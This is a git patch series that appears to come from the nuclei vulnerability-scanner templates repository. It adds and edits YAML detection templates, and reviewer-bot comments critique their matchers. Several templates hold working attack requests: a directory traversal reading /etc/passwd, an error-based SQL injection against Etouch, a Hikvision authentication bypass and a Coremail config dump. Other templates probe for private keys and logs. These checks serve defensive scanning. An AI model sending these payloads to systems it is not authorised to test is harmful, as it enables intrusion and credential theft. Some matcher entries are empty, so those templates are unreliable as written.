From 7b447029466eeb7f365166cfcaed61006fb9bc26 Mon Sep 17 00:00:00 2001 From: Julian Vilas Date: Tue, 6 Apr 2021 15:40:01 +0200 Subject: [PATCH 01/79] Remove duplicated CVE-2020-26073 template --- cves/2020/CVE-2020–26073.yaml | 25 ------------------------- 1 file changed, 25 deletions(-) delete mode 100644 cves/2020/CVE-2020–26073.yaml diff --git a/cves/2020/CVE-2020–26073.yaml b/cves/2020/CVE-2020–26073.yaml deleted file mode 100644 index 47d9a67723..0000000000 --- a/cves/2020/CVE-2020–26073.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: CVE-2020-26073 -info: - name: Cisco SD-WAN vManage Software Directory Traversal - author: madrobot - severity: high - description: | - A vulnerability in the application data endpoints of Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to gain access to sensitive information. - - The vulnerability is due to improper validation of directory traversal character sequences within requests to application programmatic interfaces (APIs). An attacker could exploit this vulnerability by sending malicious requests to an API within the affected application. A successful exploit could allow the attacker to conduct directory traversal attacks and gain access to sensitive information including credentials or user tokens. - reference: https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-vman-traversal-hQh24tmk.html - tags: lfi,cve,cve2020,cisco - -requests: - - method: GET - path: - - "{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - words: - - "root:[x*]:0:0:" - part: body From 93e373621be9c8567c7b876a5a3834dc01363f00 Mon Sep 17 00:00:00 2001 
From: Julian Vilas Date: Tue, 6 Apr 2021 15:51:01 +0200 Subject: [PATCH 02/79] Rename docker-compose-config.yml template to yaml --- .../{docker-compose-config.yml => docker-compose-config.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename exposures/configs/{docker-compose-config.yml => docker-compose-config.yaml} (100%) diff --git a/exposures/configs/docker-compose-config.yml b/exposures/configs/docker-compose-config.yaml similarity index 100% rename from exposures/configs/docker-compose-config.yml rename to exposures/configs/docker-compose-config.yaml From 109da5c0bbf9d37aebeab8615e68b2cd2d694143 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 6 Apr 2021 14:44:27 +0000 Subject: [PATCH 03/79] Auto Update README [Tue Apr 6 14:44:27 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index bf4e126bf4..05a0a48565 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 267 | vulnerabilities | 119 | exposed-panels | 117 | +| cves | 266 | vulnerabilities | 119 | exposed-panels | 117 | | takeovers | 67 | exposures | 66 | technologies | 58 | | misconfiguration | 54 | workflows | 27 | miscellaneous | 20 | | default-logins | 21 | exposed-tokens | 9 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**82 directories, 889 files**. +**82 directories, 888 files**. From 81d8f6ed0a2c30e4f192768199a754e9b84f728d Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 6 Apr 2021 19:13:34 +0000 Subject: [PATCH 04/79] Update error-logs.yaml --- exposures/logs/error-logs.yaml | 3 +++ 1 file changed, 3 insertions(+) 
diff --git a/exposures/logs/error-logs.yaml b/exposures/logs/error-logs.yaml index e61e7b1452..1fec819f7c 100644 --- a/exposures/logs/error-logs.yaml +++ b/exposures/logs/error-logs.yaml @@ -8,6 +8,9 @@ info: requests: - method: GET path: + - "{{BaseURL}}/config/error_log" + - "{{BaseURL}}/error_log" + - "{{BaseURL}}/errors_log" - "{{BaseURL}}/logs/error.log" - "{{BaseURL}}/logs/errors.log" - "{{BaseURL}}/log/error.log" From bf7e68855464ef0d157b67f3bc9ee7444c6c9aa7 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 6 Apr 2021 19:18:24 +0000 Subject: [PATCH 05/79] Update error-logs.yaml --- exposures/logs/error-logs.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/logs/error-logs.yaml b/exposures/logs/error-logs.yaml index 1fec819f7c..2d435d6f51 100644 --- a/exposures/logs/error-logs.yaml +++ b/exposures/logs/error-logs.yaml @@ -8,6 +8,7 @@ info: requests: - method: GET path: + - "{{BaseURL}}/routes/error_log" - "{{BaseURL}}/config/error_log" - "{{BaseURL}}/error_log" - "{{BaseURL}}/errors_log" From 3c8e98f3d47743f9dd4b8e3ab9607cc859c327b9 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 6 Apr 2021 19:27:45 +0000 Subject: [PATCH 06/79] Update laravel-log-file.yaml --- exposures/logs/laravel-log-file.yaml | 15 ++++++++++++--- 1 file changed, 12 insertions(+), 3 deletions(-) diff --git a/exposures/logs/laravel-log-file.yaml b/exposures/logs/laravel-log-file.yaml index 917a56a4ac..75b47eac0b 100644 --- a/exposures/logs/laravel-log-file.yaml +++ b/exposures/logs/laravel-log-file.yaml @@ -2,7 +2,7 @@ id: laravel-log-file info: name: Laravel log file publicly accessible - author: sheikhrishad + author: sheikhrishad & geeknik severity: low tags: laravel,log,exposure 
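Review bot: The three added paths (and `{{BaseURL}}/routes/error_log` in the following patch on the same file) widen the probe list, but the template's matchers sit outside this hunk, so I cannot confirm that a response must contain log-line content rather than merely return 200; `{{BaseURL}}/error_log` in particular can get a 200 from any catch-all handler. Worth confirming the matchers require a body token before the list grows further, and checking the list for repeats — a duplicate `/admin/logs/errors.log` entry is removed from this same list by a later patch in the series. The path list continues past the end of the hunk.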
@@ -14,10 +14,19 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - "InvalidArgumentException" - condition: and - + - "local.ERROR" + - "ErrorException" + - "syntax error" + condition: or + - type: word + part: header + words: + - "text/plain" + - "text/x-log" + condition: or - type: status status: - 200 From 476473dc991248b6fe9a5c033cd76867667176d9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 7 Apr 2021 01:19:30 +0530 Subject: [PATCH 07/79] Create coremail-config-disclosure.yaml --- .../configs/coremail-config-disclosure.yaml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposures/configs/coremail-config-disclosure.yaml diff --git a/exposures/configs/coremail-config-disclosure.yaml b/exposures/configs/coremail-config-disclosure.yaml new file mode 100644 index 0000000000..394ce246de --- /dev/null +++ b/exposures/configs/coremail-config-disclosure.yaml @@ -0,0 +1,21 @@ +id: coremail-config-disclosure +info: + name: Coremail Config Disclosure + author: princechaddha + severity: high + reference: https://www.secpulse.com/archives/107611.html + tags: config,exposure + +requests: + - method: GET + path: + - '{{BaseURL}}/mailsms/s?func=ADMIN:appState&dumpConfig=/' + matchers-condition: and + matchers: + - type: word + words: + - "" + - 'containerDefinitions' + - type: status + status: + - 302 From d336658e9c512a3fd2542d7b9015d38e93943568 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Wed, 7 Apr 2021 03:19:34 +0000 Subject: [PATCH 08/79] Update server-private-keys.yaml --- exposures/configs/server-private-keys.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/configs/server-private-keys.yaml b/exposures/configs/server-private-keys.yaml index 6ce75dead1..53553efdd6 100644 --- a/exposures/configs/server-private-keys.yaml +++ b/exposures/configs/server-private-keys.yaml 
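Review bot: The body word `local.ERROR` only matches Laravel's log prefix for the `local` environment, so a log written under `production` (prefix `production.ERROR`) is caught only if one of the weaker words such as `syntax error` happens to appear; consider adding `- "production.ERROR"` next to `local.ERROR`, or a regex matcher on `\.(ERROR|CRITICAL)` that is environment-independent. As far as I can tell the word matcher compares case-sensitively, so the header words `text/plain` and `text/x-log` will not match a `Content-Type: Text/Plain` header and the `and` condition then fails — presumably acceptable, but a one-line comment saying so would help. The request definition (method and path) is above the hunk.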
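Review bot: The first entry under `words` in `coremail-config-disclosure.yaml` is an empty string (`- ""`) as the patch is shown, and an empty needle is contained in every body, so with the default `or` condition the word matcher always passes and the template reduces to "status is 302"; if a token was lost in extraction (likely, since nothing else explains an empty entry beside `containerDefinitions`) it needs restoring, otherwise drop the entry. The same empty-word entry appears in the `aws-object-listing.yaml` and `CVE-2017-7921.yaml` hunks later in this series and should be checked there too. Matching body content on a `302` is unusual enough to deserve a comment such as `# the dump is returned in the body of the redirect response` if that is the observed behaviour, and the template lacks a `description`.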
@@ -9,6 +9,7 @@ info: requests: - method: GET path: + - "{{BaseURL}}/localhost.key" - "{{BaseURL}}/host.key" - "{{BaseURL}}/www.key" - "{{BaseURL}}/private-key" From 7bc9df16d728522d56d837cc5c8f38b0b3c5aa19 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 7 Apr 2021 14:26:16 +0530 Subject: [PATCH 09/79] misc fix --- cves/2019/CVE-2019-12461.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/cves/2019/CVE-2019-12461.yaml b/cves/2019/CVE-2019-12461.yaml index 1980e3cf67..156fac2f58 100644 --- a/cves/2019/CVE-2019-12461.yaml +++ b/cves/2019/CVE-2019-12461.yaml @@ -7,9 +7,7 @@ info: description: Web Port 1.19.1 allows XSS via the /log type parameter. tags: cve,cve2019,xss reference: https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS -# Vendor Homepage: https://webport.se/ -# Software Link: https://webport.se/nedladdningar/ -# reference: + software: https://webport.se/nedladdningar/ requests: - method: GET From 2292a7a0384496bfb77bf453b48c79ac36079e20 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 7 Apr 2021 15:08:47 +0530 Subject: [PATCH 10/79] Adding aws-bucket-service detection --- technologies/aws-bucket-service.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 technologies/aws-bucket-service.yaml diff --git a/technologies/aws-bucket-service.yaml b/technologies/aws-bucket-service.yaml new file mode 100644 index 0000000000..6112a1c409 --- /dev/null +++ b/technologies/aws-bucket-service.yaml 
@@ -0,0 +1,21 @@ +id: aws-bucket-service + +info: + name: Detect websites using AWS Bucket storage + author: pdteam + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - contains(tolower(all_headers), 'x-amz-bucket') + - contains(tolower(all_headers), 'x-amz-request') + - contains(tolower(all_headers), 'x-amz-id') + - contains(tolower(all_headers), 'AmazonS3') + part: header + condition: or \ No newline at end of file From 0e097263ca8a1b9e5765a8d621b93a6106b03e90 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 7 Apr 2021 15:52:58 +0530 Subject: [PATCH 11/79] Added google-bucket-service detection --- .../amazon-docker-config-disclosure.yaml | 2 +- technologies/aws-bucket-service.yaml | 12 +++++++-- technologies/google-bucket-service.yaml | 25 +++++++++++++++++++ 3 files changed, 36 insertions(+), 3 deletions(-) create mode 100644 technologies/google-bucket-service.yaml diff --git a/exposures/configs/amazon-docker-config-disclosure.yaml b/exposures/configs/amazon-docker-config-disclosure.yaml index 943d81f7df..d8406dccc1 100644 --- a/exposures/configs/amazon-docker-config-disclosure.yaml +++ b/exposures/configs/amazon-docker-config-disclosure.yaml @@ -4,7 +4,7 @@ info: name: Dockerrun AWS Configuration Exposure author: pdteam severity: medium - tags: config,exposure + tags: config,exposure,aws requests: - method: GET diff --git a/technologies/aws-bucket-service.yaml b/technologies/aws-bucket-service.yaml index 6112a1c409..b3eacd8135 100644 --- a/technologies/aws-bucket-service.yaml +++ b/technologies/aws-bucket-service.yaml @@ -1,15 +1,17 @@ id: aws-bucket-service info: - name: Detect websites using AWS Bucket storage + name: Detect websites using AWS bucket storage author: pdteam severity: info + tags: aws,tech requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: dsl dsl: 
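Review bot: `contains(tolower(all_headers), 'AmazonS3')` can never be true, because the haystack is lower-cased while the needle keeps upper-case letters; the line should read `- contains(tolower(all_headers), 'amazons3')`. The same line survives as context in the follow-up patch that restructures this template, so it needs fixing there as well. The file is also written without a trailing newline (`\ No newline at end of file`), as is `google-bucket-service.yaml` in the next patch; both should end with exactly one newline.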
@@ -18,4 +20,10 @@ requests: - contains(tolower(all_headers), 'x-amz-id') - contains(tolower(all_headers), 'AmazonS3') part: header - condition: or \ No newline at end of file + condition: or + + - type: dsl + dsl: + - contains(tolower(all_headers), 'x-guploader-uploadid') + part: header + negative: true \ No newline at end of file diff --git a/technologies/google-bucket-service.yaml b/technologies/google-bucket-service.yaml new file mode 100644 index 0000000000..f8fe51f476 --- /dev/null +++ b/technologies/google-bucket-service.yaml @@ -0,0 +1,25 @@ +id: google-bucket-service + +info: + name: Detect websites using Google bucket storage + author: pdteam + severity: info + tags: google,tech + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - contains(tolower(all_headers), 'x-goog-component-count') + - contains(tolower(all_headers), 'x-goog-expiration') + - contains(tolower(all_headers), 'x-goog-generation') + - contains(tolower(all_headers), 'x-goog-metageneration') + - contains(tolower(all_headers), 'x-goog-stored-content-encoding') + - contains(tolower(all_headers), 'x-goog-stored-content-length') + - contains(tolower(all_headers), 'x-guploader-uploadid') + part: header + condition: or \ No newline at end of file From 55a68f95bd22d52bbf97d9c7369a0d53c8951882 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 7 Apr 2021 10:38:40 +0000 Subject: [PATCH 12/79] Auto Update README [Wed Apr 7 10:38:40 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 05a0a48565..f00165eabd 100644 --- a/README.md +++ b/README.md 
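Review bot: The new `negative: true` dsl matcher, combined with `matchers-condition: and`, vetoes the AWS detection for any response carrying `x-guploader-uploadid`, even when `x-amz-*` headers are present, and nothing in the hunk says why; presumably it is meant to avoid reporting hosts already covered by `google-bucket-service.yaml`, but that should be stated in a comment above the matcher, e.g. `# exclude responses that also carry Google upload headers`. The hunk again ends without a trailing newline.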
@@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 266 | vulnerabilities | 119 | exposed-panels | 117 | -| takeovers | 67 | exposures | 66 | technologies | 58 | +| takeovers | 67 | exposures | 66 | technologies | 60 | | misconfiguration | 54 | workflows | 27 | miscellaneous | 20 | | default-logins | 21 | exposed-tokens | 9 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**82 directories, 888 files**. +**82 directories, 890 files**. From 76dcebcf85925a221e62dd2bf46094ab266f36ef Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 7 Apr 2021 17:45:12 +0530 Subject: [PATCH 13/79] Added AWS Bucket Object listing detection --- misconfiguration/aws-object-listing.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 misconfiguration/aws-object-listing.yaml diff --git a/misconfiguration/aws-object-listing.yaml b/misconfiguration/aws-object-listing.yaml new file mode 100644 index 0000000000..b068f6a653 --- /dev/null +++ b/misconfiguration/aws-object-listing.yaml @@ -0,0 +1,24 @@ +id: aws-object-listing + +info: + name: AWS bucket with Object listing + author: pdteam + severity: low + reference: https://mikey96.medium.com/cloud-based-storage-misconfigurations-critical-bounties-361647f78a29 + tags: aws,misconfig + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + words: + - '' + part: body + + - type: word + words: + - application/xml + part: header \ No newline at end of file From 9a4d880b88fd9d3ca850a8911f4d0fb2c9508c6d Mon Sep 17 00:00:00 2001 
From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 7 Apr 2021 17:45:49 +0530 Subject: [PATCH 14/79] Update aws-object-listing.yaml --- misconfiguration/aws-object-listing.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/misconfiguration/aws-object-listing.yaml b/misconfiguration/aws-object-listing.yaml index b068f6a653..1e970518b4 100644 --- a/misconfiguration/aws-object-listing.yaml +++ b/misconfiguration/aws-object-listing.yaml @@ -12,6 +12,7 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word words: From 8b88157c816af2e6dfbab1e5881c9caed28a6128 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 7 Apr 2021 12:19:43 +0000 Subject: [PATCH 15/79] Auto Update README [Wed Apr 7 12:19:43 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index f00165eabd..8fa750cb99 100644 --- a/README.md +++ b/README.md @@ -39,11 +39,11 @@ An overview of the nuclei template directory including number of templates assoc | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 266 | vulnerabilities | 119 | exposed-panels | 117 | | takeovers | 67 | exposures | 66 | technologies | 60 | -| misconfiguration | 54 | workflows | 27 | miscellaneous | 20 | +| misconfiguration | 55 | workflows | 27 | miscellaneous | 20 | | default-logins | 21 | exposed-tokens | 9 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**82 directories, 890 files**. +**82 directories, 891 files**. From c103f8c73c87abefada0994e56a4441b25d13b07 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 7 Apr 2021 17:57:53 +0530 Subject: [PATCH 16/79] Removing duplicate --- exposures/logs/error-logs.yaml | 1 - 1 file changed, 1 deletion(-) 
diff --git a/exposures/logs/error-logs.yaml b/exposures/logs/error-logs.yaml index 2d435d6f51..bb3e7f653c 100644 --- a/exposures/logs/error-logs.yaml +++ b/exposures/logs/error-logs.yaml @@ -25,7 +25,6 @@ requests: - "{{BaseURL}}/admin/logs/error.log" - "{{BaseURL}}/admin/logs/errors.log" - "{{BaseURL}}/admin/log/error.log" - - "{{BaseURL}}/admin/logs/errors.log" - "{{BaseURL}}/admin/error.log" - "{{BaseURL}}/admin/errors.log" - "{{BaseURL}}/{{Hostname}}/error.log" From dd9a7a4b389f483c64aaaa330384ef3dd4c7ca00 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 7 Apr 2021 22:03:04 +0530 Subject: [PATCH 17/79] Create somfy-login.yaml --- exposed-panels/somfy-login.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/somfy-login.yaml diff --git a/exposed-panels/somfy-login.yaml b/exposed-panels/somfy-login.yaml new file mode 100644 index 0000000000..9e43ef1ec2 --- /dev/null +++ b/exposed-panels/somfy-login.yaml @@ -0,0 +1,22 @@ +id: somfy-login + +info: + name: Somfy Login Page + author: DhiyaneshDK + severity: info + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}/m_login.htm' + + matchers-condition: and + matchers: + - type: word + words: + - Home motion by Somfy + condition: and + - type: status + status: + - 200 From 03c6126f60dc3aaf63dc01183c6960c5e1a43cf3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 7 Apr 2021 22:03:17 +0530 Subject: [PATCH 18/79] Create etouch-v2-sqli.yaml --- vulnerabilities/other/etouch-v2-sqli.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 vulnerabilities/other/etouch-v2-sqli.yaml diff --git a/vulnerabilities/other/etouch-v2-sqli.yaml b/vulnerabilities/other/etouch-v2-sqli.yaml new file mode 100644 index 0000000000..8e3c2ba11f --- /dev/null +++ b/vulnerabilities/other/etouch-v2-sqli.yaml 
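Review bot: `condition: and` on a `words` list with a single entry (`Home motion by Somfy`) in `somfy-login.yaml` is a no-op and reads as if more words were expected; either drop the line or add a second token so the condition means something. The path is single-quoted (`'{{BaseURL}}/m_login.htm'`) while the other new templates in this series double-quote theirs — harmless, but worth aligning. A `description` or `reference` naming the product that serves `m_login.htm` would help triage.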
@@ -0,0 +1,22 @@ +id: etouch-v2-sqli +info: + name: Etouch v2 SQL Injection + author: princechaddha + severity: high + tags: etouch,sqli + +requests: + - method: GET + path: + - "{{BaseURL}}/upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)''" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "c4ca4238a0b923820dcc509a6f75849b" + part: body From e2ae9342eebace41c6090b3c7c210e3869525ea2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 7 Apr 2021 16:33:36 +0000 Subject: [PATCH 19/79] Auto Update README [Wed Apr 7 16:33:36 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 8fa750cb99..e0281d7bc2 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 266 | vulnerabilities | 119 | exposed-panels | 117 | +| cves | 266 | vulnerabilities | 120 | exposed-panels | 117 | | takeovers | 67 | exposures | 66 | technologies | 60 | | misconfiguration | 55 | workflows | 27 | miscellaneous | 20 | | default-logins | 21 | exposed-tokens | 9 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**82 directories, 891 files**. +**82 directories, 892 files**. From a3510d29a09f1c402457fdd12bb32469588bb40f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 7 Apr 2021 22:30:37 +0530 Subject: [PATCH 20/79] Create CVE-2017-7921.yaml --- cves/2017/CVE-2017-7921.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 cves/2017/CVE-2017-7921.yaml 
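Review bot: A `severity: high` template with neither `reference` nor `description` is hard to triage; add the advisory or write-up the check is based on under `reference:` and a one-line `description:`. The match depends on `c4ca4238a0b923820dcc509a6f75849b` being reflected in a 200 body, so a comment such as `# expects md5(1) echoed in the response body` above the word matcher would make the expected evidence explicit for whoever reviews hits. The path value is correctly quoted, since it contains `*`, `(` and `,`.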
diff --git a/cves/2017/CVE-2017-7921.yaml b/cves/2017/CVE-2017-7921.yaml new file mode 100644 index 0000000000..29ca8293c2 --- /dev/null +++ b/cves/2017/CVE-2017-7921.yaml @@ -0,0 +1,24 @@ +id: CVE-2017-7921 +info: + name: Hikvision Authentication Bypass + author: princechaddha + severity: high + reference: https://www.cvedetails.com/cve/CVE-2017-7921/ + tags: cve,cve2017,auth-bypass + +requests: + - method: GET + path: + - "{{BaseURL}}/system/deviceInfo?auth=YWRtaW46MTEK" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + words: + - "application/xml" + part: header From 3e1e41d6bd91b02334f180fcff1bf4c22aa8f7d0 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Wed, 7 Apr 2021 17:39:24 +0000 Subject: [PATCH 21/79] Create yii-debugger.yaml --- exposures/configs/yii-debugger.yaml | 32 +++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 exposures/configs/yii-debugger.yaml diff --git a/exposures/configs/yii-debugger.yaml b/exposures/configs/yii-debugger.yaml new file mode 100644 index 0000000000..24e3b37984 --- /dev/null +++ b/exposures/configs/yii-debugger.yaml @@ -0,0 +1,32 @@ +id: yii-debugger + +info: + name: View Yii Debugger Information + author: geeknik + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}/debug/default/view.html" + - "{{BaseURL}}/debug/default/view" + - "{{BaseURL}}/frontend/web/debug/default/view" + - "{{BaseURL}}/web/debug/default/view" + - "{{BaseURL}}/sapi/debug/default/view" + + redirects: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "Yii Debugger" + - "Status" + - "Route" + - "Log" + - "Time" + - "Memory" + - "DB" + condition: and From 110fb476146ab05f725ebfe124a25e1e7db7d3c7 Mon Sep 17 00:00:00 2001 
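Review bot: `yii-debugger.yaml` has no `tags` entry while every other template in this series sets one (e.g. `tags: yii,debug,exposure`), so it is invisible to tag-based runs. With `redirects: true` the status matcher applies to the final response, so the 200 may belong to a page reached via redirect; the `and` condition on `Yii Debugger` keeps that from firing, but the short tokens `Log`, `Time` and `DB` add little, and an explicit `part: body` on the word matcher would make the default visible. The later patch in the series adds a `reference` but still no tags.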
From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Wed, 7 Apr 2021 18:57:10 +0000 Subject: [PATCH 22/79] Update yii-debugger.yaml --- exposures/configs/yii-debugger.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/configs/yii-debugger.yaml b/exposures/configs/yii-debugger.yaml index 24e3b37984..11232d47b1 100644 --- a/exposures/configs/yii-debugger.yaml +++ b/exposures/configs/yii-debugger.yaml @@ -3,6 +3,7 @@ id: yii-debugger info: name: View Yii Debugger Information author: geeknik + reference: https://yii2-framework.readthedocs.io/en/stable/guide/tool-debugger/ severity: info requests: From 17d67174f81e81f7cc41b6d6c6a17b8eeff00835 Mon Sep 17 00:00:00 2001 
From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 8 Apr 2021 21:15:49 +0530 Subject: [PATCH 23/79] More tokens and keys :rocket: --- .../amazon-mws-auth-token.yaml} | 6 ++-- exposed-tokens/amazon/amazon-sns-topic.yaml | 17 +++++++++++ .../{aws => amazon}/aws-access-key-value.yaml | 2 +- exposed-tokens/amazon/s3cmd-config.yaml | 19 +++++++++++++ .../artifactory/artifactory-api-password.yaml | 18 ++++++++++++ .../artifactory/artifactory-api-token.yaml | 18 ++++++++++++ exposed-tokens/bitly/bitly-secret-key.yaml | 18 ++++++++++++ .../cloudinary/cloudinary-credentials.yaml | 18 ++++++++++++ exposed-tokens/discord/discord-webhook.yaml | 18 ++++++++++++ exposed-tokens/generic/general-tokens.yaml | 14 ++++++---- .../generic/jdbc-connection-string.yaml | 18 ++++++++++++ exposed-tokens/generic/jwt-token.yaml | 18 ++++++++++++ .../google/google-calendar-link.yaml | 18 ++++++++++++ exposed-tokens/google/oauth-access-key.yaml | 18 ++++++++++++ exposed-tokens/heroku/heroku-api-key.yaml | 17 +++++++++++ .../mailchimp/mailchimp-api-key.yaml | 2 +- .../microsoft/microsoft-teams-webhook.yaml | 17 +++++++++++ .../newrelic/newrelic-admin-api-key.yaml | 17 +++++++++++ .../newrelic/newrelic-insights-key.yaml | 17 +++++++++++ .../newrelic/newrelic-rest-api-key.yaml | 17 +++++++++++ .../newrelic-synthetics-location-key.yaml | 17 +++++++++++ .../paypal/braintree-access-token.yaml | 17 +++++++++++ exposed-tokens/picatic/picatic-api-key.yaml | 17 +++++++++++ exposed-tokens/sendgrid/sendgrid-api-key.yaml | 17 +++++++++++ exposed-tokens/slack/slack-access-token.yaml | 28 ------------------- .../slack-bot-token.yaml} | 8 +++--- exposed-tokens/slack/slack-user-token.yaml | 18 ++++++++++++ exposed-tokens/slack/slack-webhook-token.yaml | 18 ++++++++++++ exposed-tokens/sonarqube/sonarqube-token.yaml | 17 +++++++++++ .../stripe/stripe-restricted-key.yaml | 17 +++++++++++ exposed-tokens/stripe/stripe-secret-key.yaml | 17 +++++++++++ .../zapier/zapier-webhook-token.yaml | 17 
+++++++++++ exposed-tokens/zoho/zoho-webhook-token.yaml | 17 +++++++++++ 33 files changed, 489 insertions(+), 43 deletions(-) rename exposed-tokens/{aws/amazon-mws-auth-token-value.yaml => amazon/amazon-mws-auth-token.yaml} (72%) create mode 100755 exposed-tokens/amazon/amazon-sns-topic.yaml rename exposed-tokens/{aws => amazon}/aws-access-key-value.yaml (87%) create mode 100755 exposed-tokens/amazon/s3cmd-config.yaml create mode 100755 exposed-tokens/artifactory/artifactory-api-password.yaml create mode 100755 exposed-tokens/artifactory/artifactory-api-token.yaml create mode 100755 exposed-tokens/bitly/bitly-secret-key.yaml create mode 100755 exposed-tokens/cloudinary/cloudinary-credentials.yaml create mode 100755 exposed-tokens/discord/discord-webhook.yaml create mode 100755 exposed-tokens/generic/jdbc-connection-string.yaml create mode 100644 exposed-tokens/generic/jwt-token.yaml create mode 100755 exposed-tokens/google/google-calendar-link.yaml create mode 100755 exposed-tokens/google/oauth-access-key.yaml create mode 100755 exposed-tokens/heroku/heroku-api-key.yaml create mode 100755 exposed-tokens/microsoft/microsoft-teams-webhook.yaml create mode 100644 exposed-tokens/newrelic/newrelic-admin-api-key.yaml create mode 100644 exposed-tokens/newrelic/newrelic-insights-key.yaml create mode 100644 exposed-tokens/newrelic/newrelic-rest-api-key.yaml create mode 100644 exposed-tokens/newrelic/newrelic-synthetics-location-key.yaml create mode 100755 exposed-tokens/paypal/braintree-access-token.yaml create mode 100755 exposed-tokens/picatic/picatic-api-key.yaml create mode 100644 exposed-tokens/sendgrid/sendgrid-api-key.yaml delete mode 100644 exposed-tokens/slack/slack-access-token.yaml rename exposed-tokens/{generic/http-username-password.yaml => slack/slack-bot-token.yaml} (53%) create mode 100644 exposed-tokens/slack/slack-user-token.yaml create mode 100755 exposed-tokens/slack/slack-webhook-token.yaml create mode 100755 
